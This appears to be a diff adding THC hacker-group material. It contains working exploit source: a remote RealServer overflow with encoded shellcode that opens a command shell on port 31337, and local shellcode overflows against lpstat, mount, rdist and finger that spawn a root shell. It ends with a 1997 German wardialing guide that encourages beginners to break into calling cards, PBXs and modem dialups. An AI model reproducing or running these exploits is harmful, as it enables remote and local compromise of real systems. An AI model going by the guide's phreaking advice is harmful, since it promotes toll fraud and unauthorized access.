+/* THCunREAL 0.2 - Wind0wZ remote root exploit                               */
+/* Exploit by: Johnny Cyberpunk (jcyberpunk@thehackerschoice.com)            */
+/* THC PUBLIC SOURCE MATERIALS                                               */
+/*                                                                           */
+/* The exploit can be freely distributed !                                   */
+/*                                                                           */
+/* This is the much more reliable version of the Realserver < 8.0.2 exploit  */
+/* Tested with different OSes and Realserver Versions                        */
+/*                                                                           */
+/* While probing lot's of boxes via 'OPTIONS / RTSP/1.0' on TCP port 554     */
+/* i noticed that 99% of the probed machines are not up2date yet ! =;O)      */
+/*                                                                           */
+/* The shellcode is much shorter than the one in version 0.1 now and of      */
+/* course offsetless ! The encoder in front of the exploit is needed coz the */
+/* shellcode has next to 0x00,0x0d,0x0a also to be 0x20 and 0xff free !      */
+/*                                                                           */
+/* After successful exploitation of this bug, a commandshell should spawn on */
+/* TCP port 31337 ! Use netcat to connect to this port !                     */
+/*                                                                           */
+/* If there's no connectable port 31337, maybe it's blocked by a firewall !  */
+/*                                                                           */
+/* Unfortunately i hadn't a Linux/Sparc or whatever Platform Realserver 8    */
+/* runs on. I just know it's also exploitable on other OSs !                 */
+/* So if u wanna exploit other platforms, try to get Realserver 8 and use    */
+/* gdb to find out, how this can be exploited ! Good luck !                  */
+/*                                                                           */
+/* compile with MS Visual C++ : cl THCunREAL.c /link ws2_32.lib              */
+/*                                                                           */
+/* At least some greetz fly to : THC, Halvar Flake, FX, gera, MaXX, dvorak,  */
+/* scut, stealth, zip, zilvio and the rest of the combo ......               */
+/*****************************************************************************/
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <winsock2.h>
+
+char w32portshell[] =
+"\x8b\xfa\x33\xc9\xb2\x35\x90\x90\x90\x66\x81\xc1\x38\x01\x83"
+"\xc7\x1a\x8a\x1f\x32\xda\x88\x1f\x47\xe2\xf7\xde\x16\x4f\x5c"
+"\x37\x30\x59\x6c\xcd\x28\xa9\xeb\xb9\xe4\x79\x45\xe1\x36\xc5"
+"\x12\x15\x15\x05\x3d\x62\x66\x07\x6a\x06\x07\x1b\x71\x79\x79"
+"\x34\xde\x30\xdd\xcc\xca\xca\xca\x68\xb6\xd8\x1f\x5f\x05\x6c"
+"\x51\xbe\x34\xbe\x75\x39\xbe\x45\x29\x98\xbe\x4d\x3d\xb8\x6a"
+"\x09\xbe\x2e\x34\xce\xbe\x6e\x4d\x34\xce\xbe\x7e\x29\x34\xcc"
+"\xbe\x66\x11\x34\xcf\x66\x64\x67\xbe\x6e\x15\x34\xce\x04\xfc"
+"\x74\x04\xf5\xac\xbe\x01\xbe\x34\xcb\x99\x04\xf7\xe4\xd7\xb1"
+"\xf5\x40\xc2\x3a\x83\x70\x30\xb8\x71\x70\x31\x53\x0c\x25\x40"
+"\xd4\x53\x04\x25\x6f\x6d\x6b\x63\x65\x67\x1e\x7b\x25\x74\x3a"
+"\x82\x39\x7f\xbe\x31\xbd\x34\xcd\x3a\x83\x78\x30\xbc\x71\xb8"
+"\xed\xcb\x78\x30\x40\x8b\xcb\x78\x31\x41\x14\xcb\x78\x17\xb8"
+"\x68\x2d\x66\xca\xe5\xbc\xf2\x5f\x31\x6d\xbd\x70\x30\xb5\x70"
+"\x42\x3f\xb8\x68\x41\xb5\x5e\x13\x21\xdc\x4d\xca\xca\xca\xbc"
+"\xfb\x04\xee\x66\x66\x66\x66\x63\x73\x63\xca\xe5\xa2\x60\x6d"
+"\x53\xbc\x05\x5f\x25\x60\x62\xca\x60\xe1\x7b\x63\x62\xca\x60"
+"\xf9\x66\x60\x62\xca\x60\xe5\xa2\xb8\x70\xbd\x65\xca\x60\xd1"
+"\x60\x60\xca\x60\xdd\xb8\x71\x30\x39\xa1\x66\x5d\x1b\x50\x4d"
+"\x50\x5d\x69\x56\x58\x51\xa1\x04\xe7\xb8\x70\xf9\xa1\x62\x62"
+"\x62\x66\x66\xcb\xf3\x34\xc7\x67\xa1\xb8\x70\x4d\x65\xb8\x70"
+"\xbd\x65\x84\x3d\x66\x66\x5f\x25\xcb\xfb\x67\x66\x66\x66\x60"
+"\xca\x60\xd9\x5f\xca\xca\x60\xd5";
+
+void usage();
+
+int main(int argc, char *argv[])
+{  
+  unsigned short realport=554;
+  unsigned int sock,addr,i,rc;
+  unsigned char exploit_buffer[4132];
+  unsigned long retloc1,retloc2,retaddr;
+  struct sockaddr_in mytcp;
+  struct hostent * hp;
+  WSADATA wsaData;
+
+  printf("\nTHCunREAL v0.2 - Wind0wZ remote root sploit for Realserver < 8.0.2\n");
+  printf("by Johnny Cyberpunk (jcyberpunk@thehackerschoice.com)\n");
+
+  if(argc<2)
+   usage();
+
+ retloc1 = 0x6235108c; 
+ retloc2 = 0x623514b6;
+ retaddr = 0x62354f5e;
+
+ memset(exploit_buffer,'Z',4131);
+ memcpy(exploit_buffer,"SETUP /",7);
+ *(unsigned long *)&exploit_buffer[4082] = retloc1;
+ *(unsigned long *)&exploit_buffer[4086] = retloc2;
+ memcpy(&exploit_buffer[7],w32portshell,strlen(w32portshell));
+ *(unsigned long *)&exploit_buffer[4090] = retaddr;
+ memcpy(&exploit_buffer[4094],"\x83\xc2\x19\x52\xc3",5);
+ memcpy(&exploit_buffer[4099]," RTSP/1.0\r\nTransport: THCr0x!\r\n\r\n",33);
+ 
+  if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0)
+  {
+   printf("WSAStartup failed !\n");
+   exit(-1);
+  }
+  
+  hp = gethostbyname(argv[1]);
+
+  if (!hp){
+   addr = inet_addr(argv[1]);
+  }
+  if ((!hp)  && (addr == INADDR_NONE) )
+  {
+   printf("Unable to resolve %s\n",argv[1]);
+   exit(-1);
+  }
+
+  sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
+  if (!sock)
+  { 
+   printf("socket() error...\n");
+   exit(-1);
+  }
+  
+  if (hp != NULL)
+   memcpy(&(mytcp.sin_addr),hp->h_addr,hp->h_length);
+  else
+   mytcp.sin_addr.s_addr = addr;
+
+  if (hp)
+   mytcp.sin_family = hp->h_addrtype;
+  else
+   mytcp.sin_family = AF_INET;
+
+  mytcp.sin_port=htons(realport);
+ 
+  rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct sockaddr_in));
+  if(rc==0)
+  {
+    send(sock,exploit_buffer,4131,0);
+    printf("\nexploit send .... sleeping a while ....\n");
+    Sleep(1000);
+    printf("\nok ... now try to connect to port 31337 via netcat !\n");
+  }
+  else
+   printf("can't connect to realserver port!\n");
+  
+  shutdown(sock,1);
+  closesocket(sock);
+  exit(0);
+}
+ 
+void usage()
+{
+ printf("\nUsage:  <Host>\n");
+ exit(0);
+}

Exploits/lpstat.c

@@ -0,0 +1,64 @@
+/*
+ * lpstat sploit for solaris x86 2.6 and 2.7 
+ * by plasmoid/deep/thc <plasmoid@thc.org> (c) 1999
+ * supported by insected and wilkins
+ *
+ * THC - The Hacker's Choice
+ */
+
+#include <unistd.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+char shell[] =
+    "\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4"
+    "\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf"
+    "\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff"
+    "\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89\x5e\x08\x53"
+    "\xb0\x3b\xe8\xbb\xff\xff\xff\x83\xc4\x0c\xe8\xbb\xff\xff\xff\x2f"
+    "\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff\xff\xff\xff";
+
+const int buffersize = 1100;
+const char x86_nop = 0x90;
+long nop, esp;
+long offset = 0;
+char buffer[2000];
+
+long get_esp()
+{
+    __asm__("movl %esp,%eax");
+}
+
+int main(int argc, char *argv[])
+{
+    int i;
+
+    /* you shouldn't edit the offset, we run with
+       800 nops in 1100 bytes buffer, one of those
+       nops should be hit */
+
+    if (argc > 1)
+	offset = strtol(argv[1], NULL, 0);
+
+    /* if you don't succeed, modify the nop count,
+       the standart value of 801 bybtes is quite
+       strange enuff */
+
+    if (argc > 2)
+	nop = strtoul(argv[2], NULL, 0);
+    else
+	nop = 801;
+
+    esp = get_esp();
+
+    memset(buffer, x86_nop, buffersize);
+    memcpy(buffer + nop, shell, strlen(shell));
+    for (i = nop + strlen(shell); i & lt; buffersize - 4; i += 4)
+	*((int *) &buffer[i]) = esp + offset;
+
+    execl("/usr/bin/lpstat", "lpstat", "-c", buffer, NULL);
+
+    printf("exec failed!\n");
+    return 0;
+}

Exploits/mount.c

@@ -0,0 +1,49 @@
+/*
+ * mount exploit for linux x86 < 2.0.10
+ * discovered by bloodmask&vio/couin
+ * coded by plasmoid/thc/deep for thc-magazine issue #3
+ * 12/12/96 - works also on umount 
+ */
+
+#include <stdio.h>
+
+#define lv_size  1024
+#define offset     30+lv_size+8*4
+
+long get_sp()
+{
+    __asm__("movl %esp, %eax");
+}
+
+void main(int argc, char **argv)
+{
+    char execshell[] =
+	"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
+	"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
+	"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
+
+    char buffer[lv_size + 4 * 8];
+    unsigned long *ptr2 = NULL;
+    char *ptr = NULL;
+    int i;
+
+    for (i = 0; i < lv_size + 4 * 8; i++)
+	buffer[i] = 0x00;
+
+    ptr = buffer;
+    for (i = 0; i < lv_size - strlen(execshell); i++)
+	*(ptr++) = 0x90;
+
+    for (i = 0; i < strlen(execshell); i++)
+	*(ptr++) = execshell[i];
+
+    ptr2 = (long *) ptr;
+    for (i = 1; i < 2; i++)
+	*(ptr2++) = get_sp() + offset;
+
+    printf("discovered by bloodmask&vio/couin\n"
+	   "coded by plasmoid/thc/deep\n" "for thc-magazine issue #3\n");
+
+    (void) alarm((int) 0);
+    execl("/bin/mount", "mount", buffer, NULL);
+}

Exploits/rdist.c

@@ -0,0 +1,50 @@
+/*
+ * rdist exploit for freebsd & bsd/os x86 2.0
+ * discovered by brian mitchell
+ * coded by plasmoid/thc/deep for thc-magazine issue #3
+ * 12/12/96
+ */
+
+#include <stdio.h>
+
+#define lv_size   256
+#define offset     30+lv_size+8*4
+
+long get_sp()
+{
+    __asm__("movl %esp, %eax");
+}
+
+
+main(int argc, char **argv)
+{
+    char execshell[] =
+	"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
+	"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
+	"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
+	"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
+
+    char buffer[lv_size + 4 * 8];
+    unsigned long *ptr2 = NULL;
+    char *ptr = NULL;
+    int i;
+
+    for (i = 0; i < lv_size + 4 * 8; i++)
+	buffer[i] = 0x00;
+
+    ptr = buffer;
+    for (i = 0; i < lv_size - strlen(execshell); i++)
+	*(ptr++) = 0x90;
+
+    for (i = 0; i < strlen(execshell); i++)
+	*(ptr++) = execshell[i];
+
+    ptr2 = (long *) ptr;
+    for (i = 1; i < 2; i++)
+	*(ptr2++) = get_sp() + offset;
+
+    printf("discovered by brian mitchell\n"
+	   "coded by plasmoid/thc/deep\n" "for thc-magazine issue #3\n");
+
+    execl("/usr/bin/rdist", "rdist", "-d", buffer, "-d", buffer, NULL);
+}

Exploits/thc390pfinger.c

@@ -0,0 +1,54 @@
+// linux390 (31bit) pfinger-0.7.8 <= local exploit
+// 390 sploit by jcyberpunk@thehackerschoice.com
+// diz is just a lame proof of concept sploit
+// to show how easy 390linux exploitation is
+
+#include <stdio.h>
+#include <unistd.h>
+
+char shellcode[]=
+"\x0c\x10"              /* bassm        %r1,%r0                 */
+"\x41\x90\x10\x48"      /* la           %r9,72(%r1)             */
+"\xa7\xa8\xfb\xb4"      /* lhi          %r10,-1100              */
+"\xa7\x68\x04\x56"      /* lhi          %r6,1110                */
+"\x1a\x6a"              /* ar           %r6,%r10                */
+"\x42\x60\x10\x48"      /* stc          %r6,72(%r1)             */
+"\x17\x22"              /* xr           %r2,%r2                 */
+"\x0d\xe9"              /* basr         %r14,%r9                */
+"\xa7\x68\x04\x7a"      /* lhi          %r6,1146                */
+"\x1a\x6a"              /* ar           %r6,%r10                */
+"\x42\x60\x10\x49"      /* stc          %r6,73(%r1)             */
+"\x0d\xe9"              /* basr         %r14,%r9                */
+"\xa7\x68\x04\x57"      /* lhi          %r6,1111                */
+"\x1a\x6a"              /* ar           %r6,%r10                */
+"\x42\x60\x10\x49"      /* stc          %r6,73(%r1)             */
+"\x41\x20\x10\x4c"      /* la           %r2,76(%r1)             */
+"\x50\x20\x10\x54"      /* st           %r2,84(%r1)             */
+"\x41\x30\x10\x54"      /* la           %r3,84(%r1)             */
+"\x17\x44"              /* xr           %r4,%r4                 */
+"\x42\x40\x10\x53"      /* stc          %r4,83(%r1)             */
+"\x50\x40\x10\x58"      /* st           %r4,88(%r1)             */
+"\x41\x40\x10\x58"      /* la           %r4,88(%r1)             */
+"\x0d\xe9"              /* basr         %r14,%r9                */
+"\x0b\x17"              /* svc n after self-modification        */
+"\x07\xfe"              /* br           %r14                    */
+"\x2f\x62"              /* /b                                   */
+"\x69\x6e\x2f\x73"      /* in/s                                 */
+"\x68\x5c";             /* h\                                   */
+
+int main(void)
+{
+ unsigned int i;
+ unsigned char buf[256],*b;
+ unsigned char sc[256]; 
+ unsigned char nop[]="\x17\x44";
+ memset(buf,0,256);
+ memset(buf,'x',160);
+ b = sc;
+ for(i=0;i<=100;i++) *b++ = nop[i%2];
+ *(unsigned long *)(buf+160)=0x7fffff92; 
+ memcpy(&sc[100-strlen(shellcode)],shellcode,strlen(shellcode)); 
+ memcpy(sc,"evil=",5); 
+ putenv(sc);
+ execl("/usr/bin/finger", "finger", buf, NULL);
+}

Papers/0130scan.txt

@@ -0,0 +1,573 @@
+
+
+
+
+
+
+                              ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»   
+                              º 0130 Scanning º    
+                              ÈÍÍÍÍÍÍ» ÉÍÍÍÍÍͼ   
+                       ÚÄÄÄÄÄÄÄÄÄÄÄÄĽ ÓÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
+                       ³ (c) 1997 by van Hauser / THC ³
+                       ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
+
+
+
+
+
+
+
+
+
+     ÚÄÄÄÄÄÄÄÄÄÄÄÄ¿
+     ³ Einleitung ³
+     ÀÄÄÄÄÄÄÄÄÄÄÄÄÙ
+
+   Eigentlich wollte ich ueber unix hacking schreiben, aber nachdem der
+   urspruengliche Schreiber den Artikel ueber 0130 Scanning nicht
+   rechtzeitig fertigstellen konnte, musst ich leider in die Tasten greifen :(
+   Es ist mir ein grosses Anliegen, weil die Szene in Deutschland immer kleiner
+   und elitaerer wird, und neue Leute kaum mehr nachruecken.
+   Daher ist dieser Text vor allem etwas fuer Anfaenger und Leute die sich
+   noch nie ausgiebig mit 0130 Scanning beschaeftigt haben - fuer Experten
+   wird es nur wenig neues zu lesen geben.
+   Es wird wohl schnell auffallen, dass ich Beispiele und Bezug meistens zum
+   THC-Scan Programm machen werden - weniger aus Prestige weil ich es selbst
+   programmiert habe, sondern weil es ohne Uebertreibung das momentan beste
+   Scanner Programm ist, das zu haben ist. Es wurde vor ueber 1 1/2 Jahren
+   begonnen und mit enger Zusammenarbeit von aktiven Scannern, Blueboxern,
+   Carrier Hackern etc. weiterentwickelt und optimiert, um jedem, der sich
+   irgendwie mit Scanning beschaeftigt (beschaeftigen muss) eine optimale
+   Arbeitsplatform zu schaffen - doch dadurch wurde es sehr komplex.
+   Aktuelle Version ist uebrigens die v1.4
+   Doch genug der Schwafelei, kommen wir zum Inhalt :
+
+
+                þ Einleitung
+                þ Was ist "0130 Scanning" ?
+                þ Warum ist es fuer jeden interessant ?
+                þ Vor-/Nachteile des Hand-/Computer-Scannings
+                þ Wie identifiziert man Rufnummern und was tut man danach ?
+                þ Die Wahl des Modem und dessen Konfiguration
+                þ Wie arbeiten Scanner-Programme, welche gibt es?
+                þ Tips & Tricks zum Scannen
+                þ Tips zum Benutzen erweiterer Funktionen von THC-Scan
+                þ Die Gefahren des Scannens
+                þ Schlusswort
+
+
+
+     ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
+     ³ Was ist "0130 Scanning" ? ³
+     ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
+
+   "Wardialing", "Tollfree Scanning", "0130 Scanning", "0-800 Scanning" :
+   Alles beschreibt das gleiche, das Absuchen und Identifizieren von 
+   Telefonrufnummern, zumeist gebuehrenfreie.
+   In Deutschland sind z.B. alle Rufnummern mit der Vorwahl 0130 kostenlos
+   anzuwaehlen. Man ruft dann ein paar oder alle Nummern mit dieser Vorwahl
+   an und notiert sich was man da gefunden hat.
+
+
+
+     ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
+     ³ Warum ist es fuer jeden interessant ? ³
+     ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
+
+   Wer Novize ist und sich fuer Hacking/Phreaking interessiert weiss meistens
+   nicht wie und wo er ueberhaupt anfangen soll. Texte gibt es viele,
+   gescheite wo man was draus lernt aber nur sehr wenige. Besonders fuer
+   Anfaenger ist es meistens fast unmoeglich irgendeinen Einstieg zu finden,
+   wenn man niemanden kennt, der einen was zeigt und erklaert.
+   Besonders Praeferenzen zu finden was man gerne machen moechte ist schwer.
+   Man will ja nur ein toller "Hacker" werden - ja aber was fuer einer?
+   BBS Hacker, VMB Hacker, Unix Hacker, PBX Hacker, Modem Hacker, Scanner,
+   Blueboxer, ..., ... ??
+   Es gibt soviel womit man sich beschaeftigen *koennte* aber soviel Zeit hat
+   man in seinem Leben gar nicht, man muss sich also spezialisieren.
+   Da man aber ja gar nicht wissen kann was einem liegt bevor man es nicht
+   ausprobiert hat ist 0130 Scanning DAS ideale Mittel um einen Einstieg zu
+   finden und zu schauen was einem Spass macht.
+   Und das beste daran : es ist legal. Man kann sich also vergnuegen, lernen,
+   einen Einblick ins Hacking/Phreaking bekommen und trotzdem keine Straftat
+   begehen. Trotzdem gibt es ein paar Gefahren, doch dazu mehr in dem Abschnitt
+   "Die Gefahren des Scannings".
+   Doch auch fuer andere ist es Interessant. z.B. fuer Unix Hacker, denn
+   auf 0130 gibt es einige Moeglichkeiten in Systeme einzudringen die man
+   vom Internet aus nicht hat, oder auch nur um kostenlos ins Internet zu
+   kommen.
+   Was findet man nun beim Scanning, und was ist eigentlich eine VMB/PBX etc.?
+
+
+
+     ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
+     ³ Wie identifiziert man Rufnummern und was tut man danach ? ³
+     ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
+
+   Die 0130 Nummern sind bislang in folgende Nummerngruppen eingeteilt :
+
+   0130-8xxxxx
+   0130-1xxxxx
+   0130-xxxx (von 2xxx bis 7xxx, 0xxx und 9xxx)
+
+   also insgesamt 208000 moegliche Nummern. Wenn man also sehr fix ist, und
+   250 Anrufe/Stunde schafft braucht man nur ca. 832 Stunden = also ueber einen
+   Monat ohne Schlaf/Essen etc. ;-)
+   Wer sowas also mit System alles abscannen will sollte sich am besten mit
+   anderen zusammentun. Man muss aber dazu sagen, dass viele Bereiche nur zu
+   ca. 1-3% vergeben sind, so z.B. 0130-87xxxx bis 0130-89xxxx
+
+   Folgendes kann man beim Scannen finden :
+
+     SPRACHNUMMER - das haeufigste. Eine Bestellhotline fuer Firmen,
+                    Servicedienste fuer alles moegliche. (ADAC z.B.)
+                    Kann interessant sein, weil man sich manchmal
+                    kostenlose Sachen und Informationsmaterial
+                    zuschicken lassen kann. (Zeitungen wie die FAZ z.B.)
+                    Erkennungsmerkmal: wie sich die Personen melden ;-)
+
+     KREDITKARTENNUMMERN - Sind eher selten. Man kann ueber solche Nummern
+                           Telefongespraeche zu Lasten von Kreditkarten 
+                           (z.B. VISA -> VISA-Phone) fuehren, oder aber
+                           sogenannte Calling Cards benutzen (z.B. AT&T, MCI).
+                           Bei manchen Nummern ist ein Operator dran, bei
+                           anderen ein Computer, andere beides.
+                           Man kann z.B. mit Operatorn reden was das genau
+                           fuer Calling Cards sind, sich vielleicht Test-
+                           karten geben lassen oder einfach versuchen mit
+                           Glueck oder System Calling Cards zu hacken.
+                           Erkennungsmerkmal: Die Stimme (Operator oder
+                           Computer) fragt nach einer Kartennummer oder PIN
+
+     VOICE MAIL BOX - oder kurz VMB genannt ist so etwas wie das
+                      Anrufbeantworter-System einer grossen Firmen 
+                      Telefonanlage. Es gibt verschiedene Endnummern, an
+                      denen man fuer die jeweiligen Leute eine Nachricht
+                      hinterlassen kann. Fuer Hacker & Phreaker ist so ein
+                      System ideal, da man so sehr einfach und komfortabel
+                      Austauschen kann.
+                      Mehr Informationen hierfuer gibt es im THC-MAG #2.
+                      Erkennungsmerkmal: Eine Stimme vom Band fragt nach einer
+                      "Extension of the person you are calling" und melden sich
+                      meist am Anfang mit "Welcome to XYZ ..."
+
+     ANRUFBEANTWORTER - Jeder weiss was ein Anrufbeantworter ist und was man
+                        damit macht. Findet man halt auch, das einzige was
+                        sich darueber sagen laesst ist, dass man sie meistens
+                        von ausserhalb mit einem Code abhoeren kann und bei
+                        manchen sogar neu besprechen. Kann man zu netten Sachen
+                        verwenden.
+                        Erkennungsmerkmal: Wird wohl jeder wissen
+
+     PRIVATE BRANCH EXTENSION - oder kurz PBX genannt. Solche Systeme verlangen
+                        die Eingabe eines Codes, wonach man z.B. eine VMB, ein
+                        Modem oder sogar einen Waehlton zum weitertelefonieren
+                        bekommt. Es ist sehr beliebt unter Warez-Tradern solche
+                        mit einem Wahlton zu finden um sie solange fuer ihre
+                        Softwareschiebereien zu benutzen bis die Firma pleite
+                        oder sie geschnappt wurden.
+                        Mehr Informationen in DIESEM MAGAZIN (pbx.thc)
+                        Erkennungsmerkmal: Langer Ton oder Stille, nach einiger
+                        Zeit oder Eingabe einiger Ziffern etwas was sich wie
+                        ein Alarmton anhoert oder das Beenden der Verbindung.
+
+     MODEM DIALUP - An manchen Nummern haengt auch ein Modem dran - was man
+                    dann einfach versuchen kann zu Hacken. z.T. sind da
+                    Mailboxen dran, Unix Dialups etc. etc.
+                    Mehr Informationen in DIESEM MAGAZIN (carriers.thc)
+                    Erkennungsmerkmal: Schrille Toene, rufst du mit deinem
+                    Modem da an, siehst du "CONNECT" und danach noch mehr.
+
+     FAX EMPFANG / FAX POLLING - An einigen Nummern haengt dann auch mal ein
+                                 Fax. Bei Fax-Polling kann man sich dort
+                                 Faxe abholen, aber das ist auch alles was
+                                 man da so sinnvolles machen kann.
+                                 Erkennungsmerkmal: Schrille Toene, rufst du
+                                 mit deinem Modem an bekommst du "NO CARRIER"
+                                 und wenn du dein Modem auf FAX umstellst ein
+                                 "CONNECT FAX"
+
+   KEIN ANSCHLUSS UNTER DIESER NUMMER - sehr haeufig. *seufz*
+                                        Es lohnt sich trotzdem solche Nummern
+                                        zu speichern, denn wenn Firmen sich
+                                        sich eine 0130 Nummer schalten lassen
+                                        bekommen sie von der Telekom eine, bei
+                                        der vorher diese Meldung gab - also
+                                        einfach solche Nummern immer wieder
+                                        anwaehlen um zu schauen ob da was
+                                        neues ist.
+
+   BESETZT (TUT-TUT-TUT etc.) - es ist halt besetzt. Spaeter nochmal anrufen,
+                                aber manche Nummern sind einfach immer besetzt.
+                                Solche Nummern nennt man "dauer-busy".
+                                Erkennungsmerkmal: Besetzton
+
+   Das sind alle Typen die man beim Scannen so findet.
+   Jetzt ist natuerlich noch interessant, wie sie so prozentual verteilt sind:
+
+     59% Unbenutzt ("Kein Anschluss" etc.)
+     29% Sprachnummern
+      3% Modems
+      3% Faxe
+      2% VMBs
+      2% dauer-busy
+      1% PBXs
+      1% Kreditkartennnummern
+
+   Das ist aber sehr unterschiedlich von dem genauen Bereich den man abscannt.
+
+   Uebrigens haben wir alle Modem Nummern abgescanned : es sind insgesamt
+   ueber 1000 die man finden kann ;-)
+
+
+
+     ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
+     ³ Vor-/Nachteile des Hand-/Computer-Scannings ³
+     ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
+
+   Scannen von Hand oder scannen mit/vom Computer?
+   Das war immer eine sehr umstrittene Diskussion.
+
+                  HAND                MIT COMPUTER        NUR COMPUTER
+Geschindigkeit    langsam             sehr schnell        schnell
+Identifizierung   detailliert         sehr detailliert    grob (*)
+Modem Scanning    schlecht            sehr gut            gut
+PBX Scanning      sehr gut            gut (*)             mittel
+VMB Scanning      sehr gut            gut (*)             nicht moeglich (*)
+Sprachidentifiz.  sehr gut            gut                 mittel
+Selbst Sprechen   sehr gut            schlecht (*)        ---
+Weitere Nachteile Zettel+Stift immer  Das Modem gibt gel- wie "MIT COMPUTER" u.
+                  noetig, schlechte   egentlich ein BUSY  zusaetzlich: Nur sehr
+                  Handschrift,        aus bei einer Stim- grobe Identifikation
+                  waehlen ist langsam me. Es ist nicht    moeglich und manchmal
+                                      moeglich bei PBX/   eine falsche.
+                                      VMB nachzuwaehlen (*)
+Weitere Vorteile  Erweiterte Informa- leichte und schnel- Alles geht automa-
+                  tionen moeglich,    le Identifikation.  tisch, man muss nicht
+                  z.B. mit dem Oper-  Ausgabe im Modem-   zu Hause sein.
+                  ator sprechen, VMB  Speaker manchmal
+                  bedienen, C5 Toene  nicht gut vestaend-
+                  hoeren etc.         lich.
+
+   (*) -> Das sind Nachteile, fuer die im THC-Scan eine Abhilfe geschaffen
+          wurde, und sind bisher nur in diesem Programm implementiert.
+          Siehe weiter unten.
+
+   Fuer wen ist nun welche Technik interessant?
+
+     þ Von Hand - eigentlich nur fuer Leute die a) immer mit den Operatoren
+                  reden wollen und b) gerne mit VMB und PBX spielen aber das
+                  mit dem Computer zu muehsam finden
+     þ nur Computer - nur interessant fuer Leute die nur an PBXs oder
+                      Modems interessiert sind.
+     þ mit Computer - Fuer alle anderen, also nicht auf sowas spezialisierte.
+
+   Als Anfaenger sollte man immer "mit Computer" oder "von Hand" scannen.
+                      
+   Weshalb immer weniger fuer das umstaendliche Scannen von Hand spricht :
+   THC-Scan wurde im laufe der Jahre (hehe) immer weiter optimiert und auch
+   an die Beduerfnisse von Phreakern angepasst, die die "von Hand" Methode
+   bisher vorgezogen hatten.
+   Folgende Funktionen wurden Implementiert, um ein besseres Arbeiten zu
+   ermoeglichen, und welche Nachteile sind geblieben:
+
+     þ Das groesste Problem war immer, dass man nach dem Waehlen des Modems
+       nicht mehr weiterwaehlen kann wenn man z.B. auf eine PBX oder VMB
+       stoesst. Hierfuer wurde der "Manual Mode" eingebaut, mit dem man einfach
+       die Nummer identifiziert. Danach kommt ein Pop-Up Fenster, bei dem man
+       nun 0-9, * und # und sogar abcd waehlen kann - und man ist trotzdem
+       weiter online und verbunden wie als wuerde man von Hand waehlen.
+       Kleiner Nachteil: Das waehlen ist etwas langsamer als mit der Hand.
+
+     þ Manchmal moechte man sich mit den Operatoren unterhalten, dazu drueckt
+       man nun einfach P fuer Pause, und das Modem haengt auf. Vorher muss man
+       allerdings schnell den Telefonhoerer abnehmen. Es bleibt leider etwas
+       umstaendlich, aber weiter kann man es nicht von der Software her loesen.
+       Wer sich nicht sooo oft sich mit Operatoren unterhalten will, fuer den
+       ist das eine brauchbare Loesung
+
+     þ Was bisher nicht automatisch, also nicht mit "nur Computer" zu
+       identifizieren war, waren z.B. VMBs, oder "Kein Anschluss ...".
+       Beim THC-Scan kann man z.B. festlegen, dass jede VOICE Response
+       bei der es vorher nicht gelaeutet hat, als VMB zuzuordnen.
+       Spaeter scanned man einfach die Nummern online ab, und schaut einfach
+       welche wirklich VMBs sind.
+       Seit der Version 1.4 gibt es fuer VMBs und "Kein Anschluss ..." eine
+       weitere Moeglichkeit der Identifikation: Die Zeit. Wenn z.B. eine
+       VOICE Antwort beim Modem innerhalb von 4 Sekunden nach Waehlbeginn
+       kommt ist es "Kein Anschluss ...", und zwischen 4-10 Sekunden und
+       keinem RINGING meist eine VMB.
+
+     þ Ein Nachteil der immer bleiben wird: Ueber den Modemspeaker versteht man
+       nicht immer alles :( ... aber bei guten Modems ist es ausreichend.
